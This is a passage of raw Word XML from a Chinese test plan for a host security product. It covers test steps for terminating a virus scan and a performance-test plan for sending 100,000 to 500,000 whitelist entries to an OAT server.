            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>找到列表中一个正在查杀的主机；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74382DE8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击其列表项中“查杀操作”中的终止按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A46104C"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E09484" wp14:editId="7FAE7586">
                  <wp:extent cx="4104005" cy="1510665"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                  <wp:docPr id="555" name="图片 555" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488423(1).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4104005" cy="1510665"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEC068E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或者点击此主机“详细信息”进入详情页面，点击“终止扫描”。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C45258" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62DF9342" wp14:editId="3621354D">
                  <wp:extent cx="4104005" cy="2047240"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
                  <wp:docPr id="556" name="图片 556" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488448(1).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4104005" cy="2047240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3797F53A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6F17BA43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448728A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102ED115" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>成功终止扫描某个主机的病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1790B22B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C519FE9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6270AC59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="250FDB50" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-1"/>
      </w:pPr>
      <w:bookmarkStart w:id="396" w:name="_Toc36487983"/>
      <w:bookmarkStart w:id="397" w:name="_Toc36573251"/>
      <w:bookmarkStart w:id="398" w:name="_Toc36630337"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>性能测试</w:t>
      </w:r>
      <w:bookmarkEnd w:id="249"/>
      <w:r w:rsidRPr="0020259A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="250"/>
      <w:bookmarkEnd w:id="251"/>
      <w:bookmarkEnd w:id="252"/>
      <w:bookmarkEnd w:id="396"/>
      <w:bookmarkEnd w:id="397"/>
      <w:bookmarkEnd w:id="398"/>
    </w:p>
    <w:p w14:paraId="6C5D4EAC" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc227386492"/>
      <w:bookmarkStart w:id="400" w:name="_Toc223510689"/>
      <w:bookmarkStart w:id="401" w:name="_Toc227386349"/>
      <w:bookmarkStart w:id="402" w:name="_Toc224357952"/>
      <w:bookmarkStart w:id="403" w:name="_Toc36487984"/>
      <w:bookmarkStart w:id="404" w:name="_Toc36573252"/>
      <w:bookmarkStart w:id="405" w:name="_Toc36630338"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景名</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
      <w:bookmarkEnd w:id="400"/>
      <w:bookmarkEnd w:id="401"/>
      <w:bookmarkEnd w:id="402"/>
      <w:r w:rsidRPr="00536672">
        <w:t>称：添加白名单</w:t>
      </w:r>
      <w:bookmarkEnd w:id="403"/>
      <w:bookmarkEnd w:id="404"/>
      <w:bookmarkEnd w:id="405"/>
    </w:p>
    <w:p w14:paraId="52A008AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="406" w:name="_Toc36487985"/>
      <w:bookmarkStart w:id="407" w:name="_Toc36573253"/>
      <w:bookmarkStart w:id="408" w:name="_Toc36630339"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>场景</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:t>概述</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
      <w:bookmarkEnd w:id="407"/>
      <w:bookmarkEnd w:id="408"/>
    </w:p>
    <w:p w14:paraId="6079E023" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="Style1"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003914A3">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:iCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>白名单的吞吐量是可信计算功能实现的主要性能瓶颈，它的快慢直接决定了，异常报警的实效性，server服务器部署的数量，以及资源的占用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E989241" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-2"/>
      </w:pPr>
      <w:bookmarkStart w:id="409" w:name="_Toc36487986"/>
      <w:bookmarkStart w:id="410" w:name="_Toc36573254"/>
      <w:bookmarkStart w:id="411" w:name="_Toc36630340"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行策略设计</w:t>
      </w:r>
      <w:bookmarkEnd w:id="409"/>
      <w:bookmarkEnd w:id="410"/>
      <w:bookmarkEnd w:id="4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9"/>
        <w:gridCol w:w="2926"/>
        <w:gridCol w:w="2768"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="1D906C32" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E2FA4E5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>性能场景</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="04D5EADE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>执行策略（并发数、时长）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D9FFBED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
                <w:b/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="5FB7C82F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48937D60" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D3DA317" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>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一次性向OAT发送10万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="20A693AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>得到不同并发数下系统的性能指标</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="317C4A63" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对系统的容量做出估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="083E7915" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="Style13"/>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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>列出测试的数据指标项有哪些，值在什么区间内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="068DF9AB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="28879DB3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B9A1B5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送20万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D7D9A1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="282F68F3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FAFD257" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67251670" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>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一次性向OAT发送50万条白名单。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14DAC7CB" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="7C455F13" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3DDA0094" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>启动OAT服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6F55007C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送10笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B008345"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>得到不同并发数下系统的性能指标</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DB8A909"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对系统的容量做出估计</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4039963C"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hint="eastAsia"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>列出测试的数据指标项有哪些，值在什么区间内</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="0B6DCE6B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C5D4F98" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2926" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72C33F13" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0020259A">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:iCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>一次性发送20笔白名单，每笔1万条。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2768" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4757B955" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="0020259A" w14:paraId="238CF134" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:hRule="exact" w:val="1064"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2579" w:type="dxa"/>
            <w:vMerge/>
